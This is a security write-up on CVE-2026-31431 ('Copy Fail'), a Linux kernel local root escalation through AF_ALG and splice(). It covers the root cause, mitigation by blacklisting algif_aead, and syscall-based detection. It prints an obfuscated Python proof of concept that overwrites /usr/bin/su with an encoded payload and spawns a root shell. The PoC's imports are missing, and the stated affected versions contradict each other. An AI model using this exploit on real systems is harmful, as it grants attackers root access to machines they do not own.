← Back to Write-ups
CVE-2026-31431
Copy Fail
Severity
CRITICAL
CVSS Score
7.8
Attack Vector
Local
Disclosed
April 26, 2026
📚 Information Gathering
Executive Summary

This critical vulnerability affects Linux Kernel versions 4.14 through 6.19.12, it impacts major linux distributions including Ubuntu, Debian, and Red Hat. This allows a low privileged user within a linux shell environment to gain root access over the system. This is done through a 732 byte script that targets the AF_ALG socket that exposes the kernel's crypto subsystem to an unprivileged user space.

Affected Software & Versions
Product Name Affected Versions Fixed Version
Linux Kernel 4.14 (2017) - 6.19.11 7.0, 6.19.12, 6.18.22, 6.12.85, 6.6.137, 6.1.170, 5.15.204, and 5.10.254
Discovery Timeline
  • Initial Report: A cybersecurity researcher, Taeyang Lee, had already knew about a flaw in the AF_ALG + splice path that creates an unprivileged userspace into the crypto subsystem. He then passed his concerns into an AI agent called xint code which audited the entire subsystem and found Copy Fail after an hour of running.
  • Vendor Notification: April 26, 2026
  • Patch Release: Patches were released starting April 30, 2026
  • Active Exploitation: CISA added this CVE to their known exploited vulnerabilities catalog in May 1, 2026
⚠️ Real-World Impact: Organizations affected by this vulnerability risk unauthorized root access to internal and external linux machines.
Attack Surface
🔬 Technical Analysis
Root Cause Analysis

The root cause of this vulnerability comes from a combination of four events. The linux page cache, the AF_ALG kernel crypto socket, "authencesn" kernel AEAD template, and the splice() syscall. The combination of these four components allow the script to write an arbitrary offset to the /usr/bin/su binary.

Exploitation Mechanism

Step-by-step explanation of how an attacker would exploit this vulnerability:

  1. Attacker downloads the python script to the target system
  2. Malicious payload is executed on the target system
  3. Attacker gains an escalation of privileges
Proof of Concept

# Example Python PoC demonstrating the exploit
#!/usr/bin/env python3
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

Note: PoC provided for educational purposes only. Always obtain proper authorization before testing.

🛡️ Mitigation Strategy

Remediation Instructions

Perform these step-by-step instructions on the vulnerable environment command line.

root@vuln:~

# Confirm algif_aead is available as a loadable kernel module

modinfo algif_aead

# Blacklist the vulnerable module

echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf

# Ensure the block is active

sudo modprobe algif_aead

# Rerun the PoC script to ensure it fails

python3 /path/to/exploit/PoC/exploit.py

Monitoring & Detection

The main indicators of this exploit being used is the AF_ALG socket creation

# The exploit has to call socket(AF_ALG, SOCK_SEQPACKET, 0) 40 times in rapid succession each with a 4 byte write chunk. Watch for the following:
- splice() system calls this is where the page cache enters the crypto pipeline
- recvmsg() this call writes the 4 bytes
📖 References & Resources
Official Documentation
Technical Resources
Tools & Exploits Used
Related Reading
Disclaimer

This write-up is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing for vulnerabilities on systems you do not own.